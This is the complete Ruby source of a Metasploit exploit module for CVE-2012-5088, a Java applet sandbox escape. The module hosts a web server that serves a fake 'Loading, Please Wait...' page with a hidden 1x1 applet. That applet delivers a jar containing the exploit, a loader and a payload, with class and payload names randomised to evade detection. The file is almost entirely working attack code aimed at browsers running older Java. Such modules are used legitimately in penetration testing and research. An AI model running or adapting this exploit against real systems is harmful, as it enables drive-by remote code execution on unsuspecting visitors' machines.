##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet Method Handle Remote Code Execution',
        'Description' => %q{
          This module abuses the Method Handle class from a Java Applet to run arbitrary
          Java code outside of the sandbox. The vulnerability affects Java version 7u7 and
          earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Vulnerability discovery at security-explorations.com
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2012-5088' ],
          [ 'OSVDB', '86352' ],
          [ 'BID', '56057' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
        ],
        'Payload' => { 'Space' => 20480, 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA
            }
          ],
          [
            'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-10-16',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def setup
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-5088', 'Exploit.class')
    @exploit_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-5088', 'B.class')
    @loader_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha('Exploit'.length)
    @exploit_class.gsub!('Exploit', @exploit_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file('B.class', @loader_class)
      metasploit_str = rand_text_alpha('metasploit'.length)
      payload_str = rand_text_alpha('payload'.length)
      jar.entries.each do |entry|
        entry.name.gsub!('metasploit', metasploit_str)
        entry.name.gsub!('Payload', payload_str)
        entry.data = entry.data.gsub('metasploit', metasploit_str)
        entry.data = entry.data.gsub('Payload', payload_str)
      end
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => 'application/octet-stream' })
    when %r{/$}
      payload = regenerate_payload(cli)
      if !payload
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  def generate_html
    html = %(<html><head><title>Loading, Please Wait...</title></head>)
    html += %(<body><center><p>Loading, Please Wait...</p></center>)
    html += %(<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">)
    html += %(</applet></body></html>)
    return html
  end
end
